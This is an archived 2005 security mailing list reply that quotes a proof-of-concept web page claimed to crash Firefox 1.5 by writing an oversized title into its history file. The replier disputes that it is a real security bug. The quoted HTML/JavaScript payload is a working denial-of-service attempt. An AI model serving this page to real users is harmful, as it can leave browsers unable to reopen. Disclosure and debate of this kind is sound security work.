lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <43983726.9060804@heapoverflow.com>
Date: Thu Dec  8 13:38:06 2005
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: re: Firefox 1.5 buffer overflow (poc)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

nor a fake , nor you really dont know what is a buffer overflow, but for
sure here on my firefox 1.5 EN, the client is much longuer to load to
the next boot but it reloads fine without exceptions and there is
nothing about a security bug here...


><!-- Firefox 1.5 buffer overflow
>
>Basically firefox logs all kinda of URL data in it's history.dat file,
>this little script will set a really large topic and Firefox will then
>save that topic into it's history.dat.. The next time that firefox is
>opened, it will instantly crash due to a buffer overflow -- this will
>happen everytime until you manually delete the history.dat file -- >which
>most users won't figure out.
>
>this proof of concept will only prevent someone from reopening
>their browser after being exploited. DoS if you will. however, code
>execution is possible with some modifcations.
>
>Tested with Firefox 1.5 on Windows XP SP2.
>
>ZIPLOCK <sickbeatz@...il.com>
>
>-->
><html><head><title>heh</title><script type="text/javascript">
>function ex() {
>	var buffer = "";
>	for (var i = 0; i < 5000; i++) {
>		buffer += "A";
>	}
>	var buffer2 = buffer;
>	for (i = 0; i < 500; i++) {
>		buffer2 += buffer;
>	}
>	document.title = buffer2;
>}
></script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
></a></body></html>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
/Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
IFxjTMn8Sc0=
=SX09
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ